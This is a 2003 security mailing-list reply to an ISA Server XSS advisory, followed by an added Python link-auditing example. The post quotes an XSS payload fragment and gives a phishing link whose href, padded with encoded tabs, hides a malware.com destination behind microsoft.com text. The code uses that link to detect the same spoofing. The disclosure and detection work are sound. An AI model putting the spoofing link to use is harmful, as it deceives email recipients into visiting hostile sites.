Re: Microsoft ISA Server HTTP error handler XSS (TL#007)
http-equiv_at_excite.com
Date: 07/17/03
- Maybe in reply to: Thor Larholm: "Microsoft ISA Server HTTP error handler XSS (TL#007)"
Date: Thu, 17 Jul 2003 02:27:13 -0000 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
<!--
http:// -->
=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2f

This is very interesting. A side 'benefit' is that we can mask our
true url with the same scheme.

For an href in html in order to mask the true destination the <a
href="....>bloatedcorp.com</a>, can be manipulated by trivial
javascript to generate a custom representation in the status bar to
fool our recipient should they 'hover' the mouse over the link.

This can be defeated quite simply like so:

<A href="http://%09%09%09%09%09%09%09%09www.malware.com">http://www.microsoft.com>

In an html mail message [default in Outlook Express] plus restricted
zone in Outlook Express 6 [again default] where no scripting is
allowed, the above link when presented to the recipient in an html
email message, and tested by 'hovering' the mouse over it, yields
nothing. Blank. Thereafter accepting the url, transports us to our
site as required.

End Call

oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Are You "Certifiable"? Summer's Hottest Certification Just Got HOTTER!
With a growth rate exceeding 110%, the TICSA security practitioner
certification is one of the hottest IT credentials available. And now, for
a limited time, you can save 33% off of the TICSA certification exam! To
learn more about the TICSA certification, and to register as a TICSA
candidate online, just go to
http://www.trusecure.com/offer/s0100/
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
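The post above describes a link whose href is padded with percent-encoded tabs (%09) so that the status bar shows nothing while the anchor text shows a different host. As an added example that is not part of the post or of the list archive, the Python below shows how a mail or web filter can detect that shape from the defender's side: it collects every `<a href>` in a message, decodes and strips the tab/CR/LF characters that browsers discard before resolving a URL (the WHATWG URL rule), recovers the host the link really resolves to, and compares it with any host the visible link text claims. The sample message is constructed for this example and only reuses the hostnames the post itself mentions; the function and variable names are this example's own, not anything from ISA Server, Outlook Express or the advisory.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Percent-encoded tab, LF and CR: the padding the post relies on.
_ENC_WS = re.compile(r"%(09|0a|0d)", re.IGNORECASE)
# Raw forms of the same characters, which browsers also strip from URLs.
_STRIPPED = {"\t", "\n", "\r"}
# Anchor text that looks like a URL or a bare hostname.
_HOSTLIKE = re.compile(
    r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[/:?#].*)?$", re.IGNORECASE
)


def canonical_host(href: str) -> str:
    """Host a browser would actually connect to for this href.

    Encoded and raw tab/CR/LF are removed before parsing, so the
    %09 padding collapses and the genuine hostname is exposed.
    """
    cleaned = _ENC_WS.sub("", href)
    cleaned = "".join(ch for ch in cleaned if ch not in _STRIPPED)
    return (urlsplit(cleaned.strip()).hostname or "").lower()


def displayed_host(text: str) -> str:
    """Hostname the visible link text claims, or '' if it claims none."""
    match = _HOSTLIKE.match(text.strip())
    return match.group(1).lower() if match else ""


class _LinkCollector(HTMLParser):
    """Gathers (href, visible text) pairs for every anchor in the HTML."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def audit_links(html: str) -> list:
    """Flag anchors whose href is whitespace-padded or whose real host
    differs from the host shown in the link text."""
    parser = _LinkCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for href, text in parser.links:
        padding = len(_ENC_WS.findall(href)) + sum(href.count(c) for c in _STRIPPED)
        real = canonical_host(href)
        shown = displayed_host(text)
        reasons = []
        if padding:
            reasons.append(f"{padding} tab/CR/LF characters inside href")
        if shown and real and shown != real:
            reasons.append(f"text shows {shown} but href resolves to {real}")
        findings.append({
            "href": href, "text": text, "real_host": real,
            "shown_host": shown, "suspicious": bool(reasons), "reasons": reasons,
        })
    return findings


# Constructed sample mail body: the first anchor has the shape the post
# describes, the second is honest, the third has non-URL link text.
SAMPLE_MAIL = (
    "<p>Please review:</p>"
    '<A href="http://%09%09%09%09%09%09%09%09www.malware.com">'
    "http://www.microsoft.com</A>"
    '<a href="http://www.microsoft.com/">http://www.microsoft.com</a>'
    '<a href="http://example.com/x">read more</a>'
)

if __name__ == "__main__":
    for finding in audit_links(SAMPLE_MAIL):
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(flag, finding["real_host"], finding["reasons"])
```

Either signal on its own is worth acting on: a legitimate href has no reason to carry encoded tabs or newlines in its authority part, and a host mismatch between href and URL-shaped link text is the classic phishing tell regardless of the padding trick.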